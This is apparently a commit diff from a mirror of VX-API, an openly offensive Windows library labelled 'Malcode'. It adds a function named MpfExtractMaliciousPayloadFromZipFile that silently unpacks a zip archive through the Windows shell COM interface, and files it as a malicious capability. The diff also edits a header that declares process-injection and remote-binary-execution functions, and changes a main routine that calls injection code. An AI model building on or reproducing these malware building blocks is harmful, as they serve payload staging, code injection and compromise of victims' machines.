mirror of https://github.com/vxunderground/VX-API
parent
e47dccad19
commit
0f0f9aab4c
|
@ -23,3 +23,5 @@ x64/Debug/VX-API.exe
|
|||
*.iobj
|
||||
*.ipdb
|
||||
*.exe
|
||||
VX-API/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cpp
|
||||
VX-API/x64/Debug/VX-API.vcxproj.AssemblyReference.cache
|
||||
|
|
|
@ -161,6 +161,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu | Malcode |
|
||||
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
|
||||
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
|
||||
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
|
||||
|
|
|
@ -20,7 +20,9 @@ INT main(VOID)
|
|||
Pii.MethodEnum = E_QUEUE_USER_APC;
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
ProcessInjectionMain(&Pii);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
|
||||
MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,174 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//Microsoft doesn't natively support password protected ZIP files. Hahahaha
|
||||
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory)
|
||||
{
|
||||
IDispatch* Items = 0;
|
||||
IShellDispatch* Dispatch = 0L;
|
||||
Folder* ZippedFile = 0L;
|
||||
Folder* Destination = 0L;
|
||||
FolderItems* FilesInside = 0L;
|
||||
LONG NumberOfFiles = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
VARIANT Options, OutFolder, InZipFile, Item;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitialize(NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (PVOID*)&Dispatch);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
InZipFile.vt = VT_BSTR;
|
||||
InZipFile.bstrVal = FullPathToZip;
|
||||
|
||||
Result = Dispatch->NameSpace(InZipFile, &ZippedFile);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OutFolder.vt = VT_BSTR;
|
||||
OutFolder.bstrVal = FullPathToExtractionDirectory;
|
||||
|
||||
Result = Dispatch->NameSpace(OutFolder, &Destination);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ZippedFile->Items(&FilesInside);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->get_Count(&NumberOfFiles);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (NumberOfFiles < 1)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->QueryInterface(IID_IDispatch, (PVOID*)&Items);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Item.vt = VT_DISPATCH;
|
||||
Item.pdispVal = Items;
|
||||
Options.vt = VT_I4;
|
||||
Options.lVal = 1024 | 512 | 16 | 4;
|
||||
|
||||
Result = Destination->CopyHere(Item, Options);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if(Items)
|
||||
Items->Release();
|
||||
|
||||
if(FilesInside)
|
||||
FilesInside->Release();
|
||||
|
||||
if(Destination)
|
||||
Destination->Release();
|
||||
|
||||
if(ZippedFile)
|
||||
ZippedFile->Release();
|
||||
|
||||
if (Dispatch)
|
||||
Dispatch->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory)
|
||||
{
|
||||
IDispatch* Items = 0;
|
||||
IShellDispatch* Dispatch = 0L;
|
||||
Folder* ZippedFile = 0L;
|
||||
Folder* Destination = 0L;
|
||||
FolderItems* FilesInside = 0L;
|
||||
LONG NumberOfFiles = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
VARIANT Options, OutFolder, InZipFile, Item;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
WCHAR Source[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR CopyDestination[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(Source, FullPathToZip, MAX_PATH * sizeof(WCHAR)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(CopyDestination, FullPathToExtractionDirectory, MAX_PATH * sizeof(WCHAR)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitialize(NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (PVOID*)&Dispatch);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
InZipFile.vt = VT_BSTR;
|
||||
InZipFile.bstrVal = Source;
|
||||
|
||||
Result = Dispatch->NameSpace(InZipFile, &ZippedFile);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OutFolder.vt = VT_BSTR;
|
||||
OutFolder.bstrVal = CopyDestination;
|
||||
|
||||
Result = Dispatch->NameSpace(OutFolder, &Destination);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ZippedFile->Items(&FilesInside);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->get_Count(&NumberOfFiles);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (NumberOfFiles < 1)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->QueryInterface(IID_IDispatch, (PVOID*)&Items);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Item.vt = VT_DISPATCH;
|
||||
Item.pdispVal = Items;
|
||||
Options.vt = VT_I4;
|
||||
Options.lVal = 1024 | 512 | 16 | 4;
|
||||
|
||||
Result = Destination->CopyHere(Item, Options);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Items)
|
||||
Items->Release();
|
||||
|
||||
if (FilesInside)
|
||||
FilesInside->Release();
|
||||
|
||||
if (Destination)
|
||||
Destination->Release();
|
||||
|
||||
if (ZippedFile)
|
||||
ZippedFile->Release();
|
||||
|
||||
if (Dispatch)
|
||||
Dispatch->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -44,6 +44,7 @@
|
|||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<CLRSupport>false</CLRSupport>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
|
@ -105,6 +106,7 @@
|
|||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
<CompileAsManaged>false</CompileAsManaged>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -237,6 +239,7 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
|
|
|
@ -552,6 +552,9 @@
|
|||
<ClCompile Include="MiscGenericShellcodePayloads.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -363,7 +363,8 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfProcessInjectionViaCreateRemoteThread(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue